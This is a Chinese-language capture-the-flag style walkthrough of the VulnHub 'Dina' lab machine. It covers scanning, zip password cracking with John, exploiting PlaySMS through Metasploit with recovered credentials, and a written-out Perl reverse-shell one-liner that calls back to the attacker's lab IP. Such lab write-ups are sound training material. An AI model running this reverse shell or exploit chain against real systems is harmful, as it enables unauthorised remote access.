一、靶场信息
下载链接:www.vulnhub.com/entry/dina-…
修改网络适配器为 NAT 模式
注意:
使用了VMWare虚拟机
若操作过程中有出错,可能因为目标机挂起或其他原因导致服务没有启动或ip更换
可以重启目标机重新进行主机存活扫描
参考链接:
二、渗透流程
-
发现主机
查看kali攻击机所在网段
扫描网段内存活主机,确定主机ip为 192.168.137.129
-i 指定要监听的网卡
-r 指定ip段
-
端口扫描(masscan+nmap组合拳)
使用 masscan 扫描得到开放的 80 端口
--rate 指定扫描速率
-p 指定端口扫描范围
使用 nmap 查看端口服务
-sV 探测开启的端口来获取服务、版本信息
-T<0-5> 设置时序模块,越高速度越快
-O 进行系统探测
-p 进行指定端口的探测
-
访问80端口开放的web服务
-
扫描目录
使用 御剑 进行扫描
或者
使用 dirb
-
访问扫描的目录
secure/ 下有一个压缩包
-
破解压缩包密码,提取的文件不能正常使用
用系统播放器打开,不要用网易云,就算不能开这家伙还是要假装能载入的样子
-
思路1:在http://192.168.137.129/nothing/源码中有记录密码
-
思路2:使用 John The Ripper 爆破工具干它
-
用 zip2john 生成中间文件
-
用 john 破解密码,获得密码 freedom 命令如下:
john --format=zip Desktop/backup.john --wordlist=Desktop/500-worst-passwords.txt
-
提取后发现文件不能正常打开
-
使用编辑器打开
发现有提示url和用户名
sublime Text真滴香,插件又多又好看
-
访问获取的url
未知密码,需要进行破解
查看源码,里面有注释
未能登陆成功
结果是密码在nothing页面中
为
diana -
发现后台使用playsms系统,扫描漏洞
使用 matesploit工具扫描
(1) 使用
msfconsole进入控制面板(2)
search playsms查找相关漏洞(3)
use exploit/multi/http/playsms_filename_exec使用漏洞文件上传位于该页面
(4)
show options查看参数设置(5)参数配置
set PASSWORD diana set USERNAME touhid set TARGETURI SecreTSMSgatwayLogin(TARGETURI是上传文件页面的URI) set RHOST 192.168.137.129(靶机ip) set LHOST 192.168.137.128(kali监听机的ip)
(6)使用 exploit 执行成功,获取meterpreter权限
(7)新建终端启动 netcat 监听器,尝试从目标机器反弹shell
-n 直接使用ip,不通过域名服务器
-v 显示执行过程
-p 指定端口
-l 使用监听模式,监控传入资源
(8)在 metasploit 控制台通过perl写入反向shell, 查看nc发现连接shell成功
sudo perl -e 'use Socket;$i="192.168.137.128";$p=1235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
(9)获取flag
—— 被幸运砸到头的2020年底
